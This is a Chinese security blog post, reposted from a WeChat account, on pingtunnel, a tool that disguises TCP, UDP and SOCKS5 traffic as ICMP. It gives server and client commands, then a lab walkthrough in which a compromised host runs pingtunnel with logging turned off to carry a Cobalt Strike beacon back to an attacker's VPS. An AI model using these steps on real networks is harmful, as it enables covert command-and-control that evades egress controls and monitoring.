pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。
安装服务端
-
首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是www.yourserver.com
-
从releases下载对应的安装包,如 pingtunnel_linux64.zip,然后解压,以root权限执行
sudo wget (最新release的下载链接)sudo unzip pingtunnel_linux64.zipsudo ./pingtunnel -type server
-
(可选)关闭系统默认的 ping
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all安装客户端
-
从releases下载对应的安装包,如 pingtunnel_windows64.zip,解压
-
然后用管理员权限运行,不同的转发功能所对应的命令如下
-
如果看到有 ping pong 的 log,说明连接正常
转发 sock5
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -sock5 1转发 tcp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1转发 udp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455Docker
也可直接用docker启动,更方便。参数同上
-
server:
docker run --name pingtunnel-server -d --privileged --network host --restart=always esrrhs/pingtunnel ./pingtunnel -type server -key 123456-
client:
docker run --name pingtunnel-client -d --restart=always -p 1080:1080 esrrhs/pingtunnel ./pingtunnel -type cPingTunnel跟cobalt strike一起用
这个实验主要想说明端口转发,假设场景拿下一台机器icmp出网 只有1234端口出网。
第一步在自己公网vps设置监听
在拿下客户机运行如下命令本地8001端口转发到公vps上1234端口
pingtunnel.exe -type client -l :8001 -s192.168.254.133 -t 192.168.254.133:1234 -tcp 1 - noprint 1 -nolog 1
在公网vps设置两个监听器一个是127.0.0.1 8001 一个是 公网vps 1234
可以看到CS上反弹回来
监听器127.0.0.1生成beacon运行在被攻击机上
192.168.254.133模拟的是公网vps
原文始发于微信公众号(Khan安全攻防实验室):利用PingTunnel上线cobalt strike
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论